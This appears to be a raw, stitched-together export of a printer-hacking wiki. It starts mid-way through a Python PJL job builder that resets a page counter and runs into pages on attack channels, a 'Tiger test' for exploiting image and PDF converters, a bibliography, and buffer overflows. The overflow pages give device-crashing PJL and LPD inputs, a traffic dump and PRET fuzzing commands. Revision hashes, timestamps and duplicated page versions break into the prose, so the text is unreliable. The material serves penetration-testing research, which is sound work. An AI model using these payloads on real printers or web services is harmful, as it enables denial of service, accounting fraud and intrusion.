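    + b"  72 700 moveto (only rendered on the printer) show showpage\n"
    + b"} if\n"
    + b"72 700 moveto (accounted page) show showpage\n"
    + UEL + b"@PJL EOJ\r\n"
    + UEL + b"@PJL JOB\r\n"
    + b"@PJL SET SERVICEMODE=HPBOISEID\r\n"
    + b"@PJL SET PAGES=2342\r\n"
    + UEL + b"@PJL EOJ\r\n"
)

if __name__ == "__main__":
    print(inspect_job(SAMPLE_JOB))
    # Counter read as 2342 before and 2342 after a job charged as one page:
    print(check_counter_delta(2342, 2342, 1))
```

The PostScript match is only a heuristic, since the probe can be written in many equivalent forms; the before/after counter reconciliation is the more robust signal.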
Attack carriers (revision of 2017-02-08T09:58:30Z)

[[File:Deployment-channels.png|thumb|Overview of channels to deploy a (malicious) print job]]

Various channels like [[USB]], [[LPD]], [[IPP]], [[SMB]], or [[raw]] port 9100 printing can be used as carriers to deploy malicious print jobs. While it is possible to attack the [[Fundamentals#Network_printing_protocols|printing protocols]] themselves, most attacks discussed in this wiki target the [[PostScript]] and [[PJL]] interpreters. The payload is just routed by any of the printing channels. This is important to note because it means '''whenever the attacker can somehow ‘print’ she can attack and exploit those interpreters'''.

[[File:Printing-overview.png|400px|Attack the interpreters, not the printing channels]]

This fact makes it much harder for the blue team ([[Countermeasures#Admins|network administrators]], for example) to defend against printer attacks. Many devices even allow printing (and therefore exploitation) by uploading a raw file to the printer's [https://en.wikipedia.org/wiki/File_Transfer_Protocol FTP] service or to a form on the embedded web server. To get an impression, an overview of printing channels supported by various printer models is given below.

{| class="wikitable" style="text-align:center"
|+ Malicious print job deployment channels
|-
! Printer model !! LPD !! IPP !! Raw !! Web !! FTP !! SMB !! USB
|-
| style="text-align:left;" | HP LaserJet 1200 || ✔ || || ✔ || || || ||
|-
| style="text-align:left;" | HP LaserJet 4200N || ✔ || ✔ || ✔ || || ✔ || ||
|-
| style="text-align:left;" | HP LaserJet 4250N || ✔ || ✔ || ✔ || ✔ || ✔ || || ✔
|-
| style="text-align:left;" | HP LaserJet P2015dn || ✔ || || ✔ || || || ✔ || ✔
|-
| style="text-align:left;" | HP LaserJet M2727nfs || ✔ || || ✔ || || || ✔ || ✔
|-
| style="text-align:left;" | HP LaserJet 3392 AiO || ✔ || || ✔ || || || ✔ || ✔
|-
| style="text-align:left;" | HP Color LaserJet CP1515n || ✔ || || ✔ || || || || ✔
|-
| style="text-align:left;" | Brother MFC-9120CN || ✔ || ✔ || ✔ || || ✔ || || ✔
|-
| style="text-align:left;" | Brother DCP-9045CDN || ✔ || ✔ || ✔ || || ✔ || || ✔
|-
| style="text-align:left;" | Lexmark X264dn || ✔ || ✔ || ✔ || || ✔ || || ✔
|-
| style="text-align:left;" | Lexmark E360dn || ✔ || ✔ || ✔ || || ✔ || || ✔
|-
| style="text-align:left;" | Lexmark C736dn || ✔ || ✔ || ✔ || || ✔ || || ✔
|-
| style="text-align:left;" | Dell 5130cdn || ✔ || ✔ || ✔ || || ✔ || ✔ || ✔
|-
| style="text-align:left;" | Dell 1720n || ✔ || ✔ || ✔ || || ✔ || || ✔
|-
| style="text-align:left;" | Dell 3110cn || ✔ || || ✔ || || ✔ || || ✔
|-
| style="text-align:left;" | Kyocera FS-C5200DN || ✔ || || ✔ || || ✔ || ✔ || ✔
|-
| style="text-align:left;" | Samsung CLX-3305W || ✔ || ✔ || ✔ || || || || ✔
|-
| style="text-align:left;" | Samsung MultiPress 6345N || ✔ || ✔ || ✔ || ✔ || || || ✔
|-
| style="text-align:left;" | Konica bizhub 20p || ✔ || ✔ || ✔ || || ✔ || || ✔
|-
| style="text-align:left;" | OKI MC342dn || ✔ || ✔ || ✔ || ✔ || ✔ || ✔ || ✔
|-
| style="text-align:left;" | Konica bizhub C454e || ✔ || ✔ || ✔ || ✔ || || ✔ || ✔
|}

It must be noted that these are not the only possible attack scenarios. For example, using social engineering to make a victim print a malicious document is not even covered in this wiki yet – neither are new methods to deploy (potentially malicious) print jobs like [https://en.wikipedia.org/wiki/Cloud_printing cloud printing] or [https://webbluetoothcg.github.io/web-bluetooth/ Web Bluetooth].

== Attacker Models ==

A '''physical attacker''' has the capability to print documents from a USB stick or via USB/parallel cable. A (wired or wireless) attacker connecting through a '''TCP/IP network''' can deploy print jobs over LPD, IPP, port 9100/tcp, FTP, SMB and the embedded web server. Under the assumption that no strong user authentication like smart card based access control or SSL client certificates is enforced, both attacker models obviously have a channel to print, which is the precondition for further attacks to be carried out. Both are certainly quite strong attacker models because they require direct access – either physical or logical – to the device. However, in penetration testing scenarios where sneaking into the building is not an option and the printer is not directly reachable over the internet, other deployment channels are required. In such cases, the '''victim's web browser''' can be used as a carrier for printer malware as discussed in [[cross-site printing]].

→ ''Related articles:'' [[USB drive or cable]], [[Port 9100 printing]], [[Cross-site printing]]
== Attacker Models == A '''physical attacker''' has the capability to print documents from USB stick or via USB/parallel cable. An (wired or wireless) attacker connecting through a '''TCP/IP network''' can deploy print jobs over LPD, IPP, port 9100/tcp, FTP, SMB and the embedded web server. Under the assumption that no strong user authentication like smart card based access control or SSL client certificates is enforced, both attacker models do obviously have a channel to print which is the precondition for further attacks to be carried out. Both are certainly quite strong attacker models because they require direct access – either physical or logical – to the device. However, in penetration testing scenarios where sneaking into the building is not an option and the printer is not directly reachable over the internet, other deployment channels are required. In such cases, the '''victim's web browser''' can be used as a carrier for printer malware as discussed in [[cross-site printing]]. → ''Related aricles:'' [[USB drive or cable]], [[Port 9100 printing]], [[Cross-site printing]] 8d54ae77cdbca61d25e23492f7a26422f36608ff BeEF 0 5 100 94 2017-01-10T18:10:31Z 134.147.128.156 0 wikitext text/x-wiki The Browser Exploitation Framework (BeEF) is a penetration testing tool that focuses on the web browser. It allows the penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. BeEF can hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context. 
'''While BeEF itself is not about printers at all, it is the framework of choice to implement [[cross-site printing]] functionality.''' == External links == * [http://beefproject.com/ Official website] 753c513bc1e31279dc506171d4c842a31f979d99 94 93 2017-01-10T17:22:26Z 134.147.128.156 0 wikitext text/x-wiki The Browser Exploitation Framework (BeEF) is a penetration testing tool that focuses on the web browser. It allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. BeEF can hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context. '''While BeEF itself is not about printers at all, it is the framework of choice to implement [[cross-site printing]] functionality.''' == External links == * [http://beefproject.com/ Official website] b7b624979742d72f873bc775e272759d498ebf27 93 7 2017-01-10T17:21:54Z 134.147.128.156 0 wikitext text/x-wiki The Browser Exploitation Framework (BeEF) is a penetration testing tool that focuses on the web browser. It allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. BeEF can hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context. 
'''While BeEF itself is not about printers at all, it is the framework of choice to implement [[cross-site printing]] functionality.''' == External links == * [http://beefproject.com/ Official website] 30877fc6c723ba8350b17597566a5637de44fdf9 7 2016-11-22T09:51:04Z Admin 1 Created page with "http://beefproject.com/ BeEF is not about printers, however XSP functionality can be implemented here" wikitext text/x-wiki http://beefproject.com/ BeEF is not about printers, however XSP functionality can be implemented here ec9c1ac391bbd13e5b6da875a56eb808dcc93eeb Beyond Printers 0 12 164 32 2017-01-20T15:44:46Z 77.182.101.158 0 Blanked the page wikitext text/x-wiki da39a3ee5e6b4b0d3255bfef95601890afd80709 32 31 2017-01-02T10:13:47Z Admin 1 wikitext text/x-wiki First: "Tiger Test" If the website allows image uploads, try renaming tiger.eps to tiger.jpg and upload it (works if ImageMagick's "convert" is used in the background and the web application does not check the file header, see ImageTragick) If the website allows PDF uploafs, try renaming tiger.eps to tiger.pdf and upload it (works if Ghostscript is used in the background and the web application does not check the file header, %PDF- is okay!) == Web Applications == -> just use cheat sheet, look at conversion result == Print Servers == -> just use cheat sheet, look at printed document == Desktop Applications == -> harder because of backchannel; thunderbird-convert? 
Hard to get a backchannel if no CVE 6942389390cb7ca1494276ccc5805c4dabb130c0 31 30 2017-01-02T10:13:06Z Admin 1 wikitext text/x-wiki First: "Tiger Test" If the website allows image uploads, try renaming tiger.eps to tiger.jpg and upload it (works if ImageMagick's "convert" is used in the background and the web application does not check the file header, see ImageTragick) If the website allows PDF uploafs, try renaming tiger.eps to tiger.pdf and upload it (works if Ghostscript is used in the background and the web application does not check the file header, %PDF- is okay!) == Web Applications == -> just use cheat sheet == Print Servers == -> just use cheat sheet == Desktop Applications == -> harder because of backchannel; thunderbird-convert? Hard to get a backchannel if no CVE e0d193ff00ed3a9ee193225021e4f0d198acb907 30 2016-12-31T11:15:33Z Admin 1 Created page with "First: "Tiger Test" If the website allows image uploads, try renaming tiger.eps to tiger.jpg and upload it (works if ImageMagick's "convert" is used in the background and the..." wikitext text/x-wiki First: "Tiger Test" If the website allows image uploads, try renaming tiger.eps to tiger.jpg and upload it (works if ImageMagick's "convert" is used in the background and the web application does not check the file header, see ImageTragick) If the website allows PDF uploafs, try renaming tiger.eps to tiger.pdf and upload it (works if Ghostscript is used in the background and the web application does not check the file header, %PDF- is okay!) 
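The Tiger test works against converters that trust the file extension. As an added example (written for this page, not the wiki's own code), the check below is what a web application should run before handing an upload to ImageMagick or Ghostscript: it sniffs the real type from the leading bytes and refuses anything that is, or contains, PostScript. The note above that a %PDF- prefix is "okay" is read here as meaning that a magic-byte check alone is not enough, so the example also scans the leading kilobyte for PostScript operators. The accepted upload types and all sample files are assumptions constructed for the illustration.

```python
import re

# Added example for the "Tiger test" notes above; not the wiki's own code.
# Accepted upload types are an assumption made for illustration.
SIGNATURES = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
    "pdf": (b"%PDF-",),
}
# Text EPS/PS starts with "%!PS"; a DOS EPS binary wrapper starts with C5 D0 D3 C6.
POSTSCRIPT_HEADERS = (b"%!PS", b"\xc5\xd0\xd3\xc6")
# Operators a PostScript payload can hardly avoid, searched in the leading bytes
# so that a plausible prefix (e.g. "%PDF-") followed by PostScript is still caught.
POSTSCRIPT_TOKENS = re.compile(rb"%!PS|%%BoundingBox|\bshowpage\b|\bsetpagedevice\b")

def sniff(data):
    """Return the type implied by the leading bytes ('ps', an extension key, or None)."""
    if data.startswith(POSTSCRIPT_HEADERS):
        return "ps"
    for ext, magics in SIGNATURES.items():
        if data.startswith(magics):
            return ext
    return None

def check_upload(filename, data):
    """Decide whether an upload may go to the converter. Returns (accepted, reason)."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in SIGNATURES:
        return False, "extension not allowed: %r" % ext
    kind = sniff(data)
    if kind == "ps":
        return False, "PostScript content disguised as .%s" % ext
    if kind is None or SIGNATURES[kind] != SIGNATURES[ext]:
        return False, "header says %s, extension says %s" % (kind, ext)
    if POSTSCRIPT_TOKENS.search(data[:1024]):
        return False, "PostScript operators behind a .%s header" % ext
    return True, "ok"

# Constructed samples: a tiger.eps stand-in, a bare JPEG/JFIF header and a skeleton PDF.
EPS_SAMPLE = (b"%!PS-Adobe-3.0 EPSF-3.0\n%%BoundingBox: 0 0 200 200\n"
              b"/Helvetica findfont 24 scalefont setfont\n20 100 moveto (tiger) show\nshowpage\n")
JPEG_SAMPLE = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00\xff\xd9"
PDF_SAMPLE = (b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog /Pages 2 0 R >>\nendobj\n"
              b"trailer\n<< /Root 1 0 R >>\n%%EOF\n")

def tiger_test_results():
    """The two renamings from the notes above, the %PDF- prefixed variant, and two legitimate files."""
    return {
        "tiger.jpg": check_upload("tiger.jpg", EPS_SAMPLE),
        "tiger.pdf": check_upload("tiger.pdf", EPS_SAMPLE),
        "tiger_prefixed.pdf": check_upload("tiger.pdf", b"%PDF-1.4\n" + EPS_SAMPLE),
        "photo.jpg": check_upload("photo.jpg", JPEG_SAMPLE),
        "report.pdf": check_upload("report.pdf", PDF_SAMPLE),
    }

if __name__ == "__main__":
    for name, (ok, why) in tiger_test_results().items():
        print("%-20s %s (%s)" % (name, "accept" if ok else "reject", why))
```

A header check only raises the bar. The stronger fix is to not hand user uploads to `convert` with the PostScript coders enabled at all, which ImageMagick's policy.xml can enforce (`<policy domain="coder" rights="none" pattern="PS" />`, and likewise for EPS and PDF), the mitigation published for ImageTragick. Whether a given converter actually executes a PostScript file behind a %PDF- prefix has to be verified against that converter; the token scan is there so the application does not depend on the answer.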
= Bibliography =
''(revision 650, 2018-07-11T11:05:41Z, Admin)''

== Research by date ==

=== 2017 ===
'''SoK: Exploiting Network Printers''' ([https://www.nds.rub.de/media/ei/veroeffentlichungen/2018/07/11/printer-security.pdf PDF])
<br>by Jens Müller, Juraj Somorovsky, Vladislav Mladenov | Blogpost: [http://web-in-security.blogspot.de/2017/01/printer-security.html]

=== 2016 ===
'''Exploiting Network Printers: A Survey of Security Flaws in Laser Printers and Multi-Function Devices''' ([https://www.nds.rub.de/media/ei/arbeiten/2017/01/30/exploiting-printers.pdf PDF])
<br>by Jens Müller, Juraj Somorovsky, Vladislav Mladenov | Proof-of-concept code: [https://github.com/RUB-NDS/PRET]

'''PWN Xerox Printers (...again): About Hardware Attacks and Insecure Cloning''' ([https://www.fkie.fraunhofer.de/content/dam/fkie/de/documents/xerox_phaser_6700_white_paper.pdf PDF])
<br>by Peter Weidenbach, Raphael Ernst

=== 2014 ===
'''A Large-Scale Analysis of the Security of Embedded Firmwares''' ([https://www.usenix.org/system/files/conference/usenixsecurity14/sec14-paper-costin.pdf PDF])
<br>by Andrei Costin, Jonas Zaddach, Aurélien Francillon, and Davide Balzarotti | Video: [https://www.youtube.com/watch?v=5gf6mFz1rPM]

'''Hacking Canon Pixma Printers - Doomed Encryption''' ([http://www.contextis.com/resources/blog/hacking-canon-pixma-printers-doomed-encryption/ HTML])
<br>by Michael Jordon

=== 2013 ===
'''Embedded Devices Security and Firmware Reverse Engineering''' ([http://s3.eurecom.fr/docs/bh13us_zaddach.pdf PDF])
<br>by Jonas Zaddach, Andrei Costin

'''Research Report on the Security of MFPs''' ([https://www.ipa.go.jp/security/jisec/apdx/documents/20130312report_E.pdf PDF])
<br>by IPA Information-technology Promotion Agency, Japan

=== 2012 ===
'''PostScript: Danger Ahead?!'''
<br>by Andrei Costin | Slides: [https://infocon.org/cons/Hack%20In%20Paris/Hack%20In%20Paris%202012/Slides/Andrei-PostScript%20Danger%20Ahead.pdf] | Video: [https://www.youtube.com/watch?v=ygcs0m5C9ZI]

=== 2011 ===
'''Print Me If You Dare: Firmware Modification Attacks and the Rise of Printer Malware'''
<br>by Ang Cui, Salvatore Stolfo | Slides: [http://ids.cs.columbia.edu/sites/default/files/CuiPrintMeIfYouDare.pdf] | Video: [https://www.youtube.com/watch?v=njVv7J2azY8]

'''Printers gone Wild (PrintFS PJL filesystem)'''
<br>by Ben Smith | Video: [http://www.securitytube.net/video/1395] | Proof-of-concept code: [http://www.remote-exploit.org/articles/printfs/index.html]

'''From Printer to Pwnd: Leveraging Multifunction Printers During Penetration Testing'''
<br>by Deral Heiland | Slides: [http://foofus.net/goons/percx/defcon/P2PWND.pdf] | Video: [https://www.youtube.com/watch?v=PH4pTCmKgOg] | Proof-of-concept code: [https://github.com/percx/Praeda]

'''From Patched to Pwned: Attacking Xerox's Multifunction Printers Patch Process''' ([http://foofus.net/goons/percx/Xerox_hack.pdf PDF])
<br>by Deral Heiland

=== 2010 ===
'''Hacking Printers for Fun and Profit'''
<br>by Andrei Costin | Slides: [http://andreicostin.com/papers/Conf%20-%20Hack.lu%20-%202010%20-%20Luxembourg%20-%20AndreiCostin_HackingPrintersForFunAndProfit.pdf] | Video: [https://www.youtube.com/watch?v=R56ZXErKCeE]

'''Juste une imprimante?''' ("Just a printer?")
<br>by NBS System | Slides: [http://www.ossir.org/jssi/jssi2010/1A.pdf]

=== 2006 ===
'''Hacking Network Printers''' ([http://www.irongeek.com/i.php?page=security/networkprinterhacking HTML])
<br>by Adrian Crenshaw (Irongeek)

=== 2002 ===
'''Understanding, Reversing, and Hacking HP Printers''' ([http://search.lores.eu/realicra/hp_slobo.htm HTML])
<br>by Slobotron

'''Printer Exploration (PFT and Hijetter, libPJL, ChaiPortScan, ChaiCrack)'''
<br>by FtR of Phenoelit, FX of Phenoelit | Proof-of-concept code: [http://www.phenoelit.org/hp/index.html]
(Lexmark/generic attacks)''' <br>by NBS System | Slides: [http://www.ossir.org/jssi/jssi2010/1A.pdf] === 2006 === '''Hacking Network Printers''' ([http://www.irongeek.com/i.php?page=security/networkprinterhacking HTML]) <br>by Irongeek === 2002 === '''Understanding, Reversing, and Hacking HP Printers''' ([http://search.lores.eu/realicra/hp_slobo.htm HTML]) <br>by Slobotron '''Printer Exploration (PFT and Hijetter, libPJL, ChaiPortScan, ChaiCrack)''' <br>FtR of Phenoelit, FX of Phenoelit | Proof-of-concept code: [http://www.phenoelit.org/hp/index.html] 91070b6f62cdea38fb05e0168e89be8dd71bf4a4 28 27 2016-12-22T17:08:18Z Admin 1 wikitext text/x-wiki [2016] Müller: "Exploiting Network Printers" * LINK: http://homepages.rub.de/jens.mueller-2/publications/2016-exploiting-network-printers.pdf * CODE: https://github.com/RUB-NDS/PRET ----------------------------------- [2014] Costin: "A Large-Scale Analysis of the Security of Embedded Firmwares" ----------------------------------- [2013] Zaddach: "Embedded Devices Security and Firmware Reverse Engineering" ----------------------------------- [2014] Jordon: "ARM Wrestling a Printer" | Canon Firmware RCE * LINK: http://www.contextis.com/resources/blog/hacking-canon-pixma-printers-doomed-encryption/ ----------------------------------- [2010] Costin: "Hacking Printers for Fun and Profit" | Use Word/JS/Java to deploy PostScript Payload * VIDEO: https://www.youtube.com/watch?v=R56ZXErKCeE [2011] Costin: "PostScript(um): You’ve Been Hacked" | PS-Shell | Look into Firmware | API available to PS-Language | {Memory Dumper, BSD-Sockets}, Xerox Firmware Update via PS-File, MSF/Attacking Demo Toolkit * LINK: https://www.corelan.be/index.php/2012/05/25/hitb2012ams-day-2-postscript-danger-ahead/ * VIDEO: https://www.youtube.com/watch?v=PqL5P46m_zQ ----------------------------------- [2011] Cui: "Print me if you Dare" | HP Firmware RCE * TALK: http://events.ccc.de/congress/2011/Fahrplan/events/4780.en.html * TALK: 
http://boingboing.net/2011/12/30/printer-malware-print-a-malic.html * VIDEO: https://www.youtube.com/watch?v=njVv7J2azY8 * SLIDES: http://ids.cs.columbia.edu/sites/default/files/CuiPrintMeIfYouDare.pdf ----------------------------------- [2011] Smith: "Printers gone Wild" | PrintFS PJL filesystem * LINK: http://blog.c22.cc/2011/01/29/shmoocon-2011-printers-gone-wild/ * CODE: http://www.remote-exploit.org/articles/printfs/index.html ----------------------------------- [2011] Heiland: "From Printer to Pwnd" | Praeda toolkit * CODE: https://github.com/percx/Praeda * VIDEO: https://www.youtube.com/watch?v=HMSLMsPJ010 * SLIDES: http://www.slideshare.net/403Labs/exploiting-vulnerabilities-in-multifunction-printersa [2011] Heiland: "From Patched to Pwned" | Xerox DLM RCE * LINK: http://foofus.net/goons/percx/Xerox_hack.pdf * LINK: http://www.xerox.com/download/security/security-bulletin/1284332-2ddc5-4baa79b70ac40/cert_XRX12-003_v1.1.pdf ----------------------------------- [2010] NBS: "Juste une imprimant?" 
| Lexmark/generic attacks * SLIDES: http://www.ossir.org/jssi/jssi2010/1A.pdf ----------------------------------- [2006] Irongeek: "Hacking Network Printers" | HP/generic tricks * LINK: http://www.irongeek.com/i.php?page=security/networkprinterhacking ----------------------------------- [2002] Slobotron: "Hacking HP Printers" | HP/generic tricks * LINK: http://search.lores.eu/realicra/hp_slobo.htm ----------------------------------- [2002] Phenoelit: "Printer Exploration" | Hijetter PJL tool * LINK: http://www.phenoelit.org/hp/index.html * CODE: PFT/Hijetter, libPJL, ChaiPortScan, ChaiCrack ----------------------------------- [Miscellaneous] * https://www.altamiracorp.com/blog/employee-posts/hacking-hp-printers-for-fun-profit * http://hackonadime.blogspot.com/2011/12/hacking-printers-pjl-basics.html * https://www.ipa.go.jp/security/jisec/apdx/documents/20130312report_E.pdf * http://www.darkreading.com/vulnerabilities-and-threats/corporate-espionages-new-friend-embedded-web-servers/d/d-id/1100343? * https://homepages.laas.fr/matthieu/talks/secu-impression.pdf 06af8c8ebedd9207dd166976a29b4394b370f66c 27 2016-12-22T17:04:48Z Admin 1 Created page with "[2014] Costin: "A Large-Scale Analysis of the Security of Embedded Firmwares" ----------------------------------- [2013] Zaddach: "Embedded Devices Security and Firmware Rev..." 
wikitext text/x-wiki [2014] Costin: "A Large-Scale Analysis of the Security of Embedded Firmwares" ----------------------------------- [2013] Zaddach: "Embedded Devices Security and Firmware Reverse Engineering" ----------------------------------- - [2014] Jordon: "ARM Wrestling a Printer" | Canon Firmware RCE * LINK: http://www.contextis.com/resources/blog/hacking-canon-pixma-printers-doomed-encryption/ ----------------------------------- - [2010] Costin: "Hacking Printers for Fun and Profit" | Use Word/JS/Java to deploy PostScript Payload * VIDEO: https://www.youtube.com/watch?v=R56ZXErKCeE - [2011] Costin: "PostScript(um): You’ve Been Hacked" | PS-Shell | Look into Firmware | API available to PS-Language | {Memory Dumper, BSD-Sockets}, Xerox Firmware Update via PS-File, MSF/Attacking Demo Toolkit * LINK: https://www.corelan.be/index.php/2012/05/25/hitb2012ams-day-2-postscript-danger-ahead/ * VIDEO: https://www.youtube.com/watch?v=PqL5P46m_zQ ----------------------------------- - [2011] Cui: "Print me if you Dare" | HP Firmware RCE * TALK: http://events.ccc.de/congress/2011/Fahrplan/events/4780.en.html * TALK: http://boingboing.net/2011/12/30/printer-malware-print-a-malic.html * VIDEO: https://www.youtube.com/watch?v=njVv7J2azY8 * SLIDES: http://ids.cs.columbia.edu/sites/default/files/CuiPrintMeIfYouDare.pdf ----------------------------------- - [2011] Smith: "Printers gone Wild" | PrintFS PJL filesystem * LINK: http://blog.c22.cc/2011/01/29/shmoocon-2011-printers-gone-wild/ * CODE: http://www.remote-exploit.org/articles/printfs/index.html ----------------------------------- - [2011] Heiland: "From Printer to Pwnd" | Praeda toolkit * CODE: https://github.com/percx/Praeda * VIDEO: https://www.youtube.com/watch?v=HMSLMsPJ010 * SLIDES: http://www.slideshare.net/403Labs/exploiting-vulnerabilities-in-multifunction-printersa - [2011] Heiland: "From Patched to Pwned" | Xerox DLM RCE * LINK: http://foofus.net/goons/percx/Xerox_hack.pdf * LINK: 
http://www.xerox.com/download/security/security-bulletin/1284332-2ddc5-4baa79b70ac40/cert_XRX12-003_v1.1.pdf ----------------------------------- - [2010] NBS: "Juste une imprimant?" | Lexmark/generic attacks * SLIDES: http://www.ossir.org/jssi/jssi2010/1A.pdf ----------------------------------- - [2006] Irongeek: "Hacking Network Printers" | HP/generic tricks * LINK: http://www.irongeek.com/i.php?page=security/networkprinterhacking ----------------------------------- - [2002] Slobotron: "Hacking HP Printers" | HP/generic tricks * LINK: http://search.lores.eu/realicra/hp_slobo.htm ----------------------------------- - [2002] Phenoelit: "Printer Exploration" | Hijetter PJL tool * LINK: http://www.phenoelit.org/hp/index.html * CODE: PFT/Hijetter, libPJL, ChaiPortScan, ChaiCrack ----------------------------------- - Miscellaneous * https://www.altamiracorp.com/blog/employee-posts/hacking-hp-printers-for-fun-profit * http://hackonadime.blogspot.com/2011/12/hacking-printers-pjl-basics.html * https://www.ipa.go.jp/security/jisec/apdx/documents/20130312report_E.pdf * http://www.darkreading.com/vulnerabilities-and-threats/corporate-espionages-new-friend-embedded-web-servers/d/d-id/1100343? * https://homepages.laas.fr/matthieu/talks/secu-impression.pdf ----------------------------------- a41b6712805d9e8d5c296ecc2b222fbeb62caa97 Buffer overflows 0 16 289 269 2017-01-28T19:02:19Z 134.147.24.11 0 wikitext text/x-wiki While the risk of [https://en.wikipedia.org/wiki/Buffer_overflow buffer overflows] is well-known <ref>''[http://phrack.org/issues/49/14.html Smashing The Stack For Fun And Profit]'', Aleph One, Phrack magazine #49, 1996, p. 14-16</ref> and not limited to printers, it must be noted that printers provide additional languages and network services, potentially prone to this kind of attack. Exploitation may lead to denial of service or – given correct shellcode and return address – even to remote code execution. 
Buffer overflows are particularly dangerous on embedded devices, which often lack protection mechanisms such as [https://en.wikipedia.org/wiki/Address_space_layout_randomization ASLR], [https://en.wikipedia.org/wiki/NX_bit NX/DEP] or user separation, so any injected code runs with full (superuser) privileges.

== PJL input ==

[[PJL]] processors may be vulnerable to buffer overflows if the given input exceeds the buffer size. For example, various ''Lexmark'' laser printers crash when receiving about 1,000 characters as the ''INQUIRE'' argument (see [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0619 CVE-2010-0619]):

<pre>
@PJL INQUIRE 00000000000000000000000000000000000000000000000000000…
</pre>

Sending about 3,000 characters as the ''SET'' argument to the ''Dell 1720n'' crashes the device and requires a manual restart to get the printer back to life:

<pre>
@PJL SET 000000000000000000000000000000000000000000000000000000000…
</pre>

'''How to test for this attack?'''

Buffer overflows in PJL input can be tested using [[PRET]]'s ''flood'' command, which sends large amounts of data as the argument of every command listed in the PJL reference <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997</ref> and of every PJL variable dynamically retrieved from the device:

<pre>
./pret.py -q printer pjl
Connection to printer established
Welcome to the pret shell. Type help or ? to list commands.
printer:/> flood
Buffer size: 10000, Sending: @PJL SET [buffer]
Buffer size: 10000, Sending: @PJL [buffer]
Buffer size: 10000, Sending: @PJL COMMENT [buffer]
Buffer size: 10000, Sending: @PJL ENTER LANGUAGE=[buffer]
Buffer size: 10000, Sending: @PJL JOB NAME="[buffer]"
Buffer size: 10000, Sending: @PJL EOJ NAME="[buffer]"
Buffer size: 10000, Sending: @PJL INFO [buffer]
Buffer size: 10000, Sending: @PJL ECHO [buffer]
Buffer size: 10000, Sending: @PJL INQUIRE [buffer]
Buffer size: 10000, Sending: @PJL DINQUIRE [buffer]
Buffer size: 10000, Sending: @PJL USTATUS [buffer]
Buffer size: 10000, Sending: @PJL RDYMSG DISPLAY="[buffer]"
Buffer size: 10000, Sending: @PJL FSQUERY NAME="[buffer]"
Buffer size: 10000, Sending: @PJL FSDIRLIST NAME="[buffer]"
Buffer size: 10000, Sending: @PJL FSINIT VOLUME="[buffer]"
Buffer size: 10000, Sending: @PJL FSMKDIR NAME="[buffer]"
Buffer size: 10000, Sending: @PJL FSUPLOAD NAME="[buffer]"
</pre>

'''Who can perform this attack?'''

Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].

== LPD daemon ==

The [[LPD]] protocol is particularly interesting when testing for buffer overflows, because it carries several user-defined fields such as ''jobname'', ''username'' or ''hostname'', which may not be sufficiently length-checked. Sending more characters than the LPD specification <ref>''[https://www.ietf.org/rfc/rfc1179.txt RFC1179: Line Printer Daemon Protocol]'', L. McLaughlin, 1990</ref> allows may result in an overflow. For example, 150 or more characters as the ''username'' operand of the control file's <code>L</code> command (''print banner page'') completely crash the ''HP LaserJet 1200'', ''HP LaserJet 4200N'', ''HP LaserJet 4250N'', ''Dell 3110cn'', ''Kyocera FS-C5200DN'' and ''Samsung MultiPress 6345N''; a manual restart is required to get the printers back to life. A network traffic dump for this attack is given below (<code>></code> marks bytes sent by the client, <code>&lt;</code> the printer's single-byte acknowledgement):

<pre>
> 02 6c 70 0a                                     .lp.
< 00                                              .
</pre>
<pre>
> 02 31 35 32 20 63 66 41 30 30 31 0a             .152 cfA001.
< 00                                              .
> 4c 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 Lxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 0a 00                      xxxxxxx..
</pre>

'''How to test for this attack?'''

A simple LPD fuzzer to test for buffer overflows can be created using the ''lpdtest'' tool included in [[PRET]]. The <code>in</code> argument sets all user inputs defined by the LPD protocol to the given value (here, 150 characters generated by Python):

<syntaxhighlight lang=sh>
./lpdtest.py printer in "`python -c 'print "x"*150'`"
</syntaxhighlight>

'''Who can perform this attack?'''

Anyone who can reach the LPD daemon over the network. A web attacker can only exploit this flaw if the browser allows cross-protocol scripting to port 515/tcp (Internet Explorer 10 does, for example); most browsers block access to the LPD port by default (see [[Cross-site printing]]).
